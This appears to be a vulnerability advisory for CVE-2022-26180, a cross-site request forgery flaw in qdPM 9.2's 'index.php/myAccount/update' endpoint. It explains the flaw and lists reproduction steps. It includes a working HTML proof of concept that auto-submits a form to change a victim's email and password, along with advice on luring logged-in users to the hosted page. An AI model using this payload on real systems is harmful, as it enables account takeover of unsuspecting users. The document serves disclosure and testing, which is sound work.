CVE-2022–26180:qdPM 9.2 CSRF Vulnerability in index.php/myAccount/update URI

source

Summary:

Through the “index.php/myAccount/update” URI, the qdPM 9.2 application is susceptible to Cross-Site Request Forgery (CSRF) attacks. The security and integrity of the application might possibly be jeopardized by this vulnerability, which enables an attacker to carry out unauthorized operations on behalf of an authenticated user.

Description:

Cross-Site Request Forgery (CSRF) attacks are possible through the “index.php/myAccount/update” URI on the qdPM 9.2 application. Because of this flaw, an attacker might change the account settings of a user who has provided authentication and take unapproved activities on their behalf.

All adjustments to user accounts, including changing passwords, email addresses, and personal information, must go through the “index.php/myAccount/update” gateway. The application on this endpoint, however, is not properly protected against CSRF, leaving it open to exploitation.

A malicious web page or HTML email must have a form that sends a request to the “index.php/myAccount/update” URI in order to exploit this issue. The form will have the required fields so that the targeted user’s account information may be changed.

An authorized user must be persuaded to visit the malicious website or click on the forged link while signed into their qdPM account in order for the CSRF attack to be effective. The malicious request is automatically made once the user interacts with the form, which results in unauthorized changes to their account.

Steps To Reproduce:

Log in to the qdPM application with a valid user account.Navigate to the “index.php/myAccount/update” page.Craft a malicious web page or HTML email containing a form that submits a request to update the user’s account details.Include the CSRF payload, targeting the “index.php/myAccount/update” URI, in the form submission.Convince the authenticated user to visit the malicious web page or click on the crafted link while logged in to qdPM.Once the user interacts with the form, the malicious request is automatically sent, resulting in the unauthorized modification of the user’s account details.

Proof of Concept (PoC):

Set up a testing environment with qdPM 9.2 installed.Log in to the qdPM application with a valid user account.create an HTML file named “csrf_poc.htmlEdit the “csrf_poc.html” file and insert the following code:<html>
<body>
<h1>CSRF PoC - qdPM 9.2</h1>
<form action="https://target.qdpm.com/index.php/myAccount/update" method="POST" id="csrfForm">
<input type="hidden" name="email" value="attacker@example.com" />
<input type="hidden" name="password" value="newpassword123" />
<!-- Additional fields can be added here to modify other account settings -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>

5. Replace “https://target.qdpm.com" with the actual URL of the qdPM application you are testing.

6. Customize the hidden input fields to specify the desired changes to the user’s account details (e.g., email, password).
Save the “csrf_poc.html” file.

7. Host the file on a web server or transfer it to a location accessible by the target user.

8. Craft a convincing message or webpage enticing the authenticated user to visit the URL hosting the “csrf_poc.html” file.

9. Once the user accesses the malicious page, the form will automatically submit the CSRF request to the “index.php/myAccount/update” URI, modifying the user’s account details without their knowledge.

Impact:

Modifying the user’s account details, such as email address, password, or personal information.Enabling or disabling certain account settings.Potentially gaining unauthorized access to sensitive informationperforming actions with serious consequences, depending on the user’s role and permissions within the application.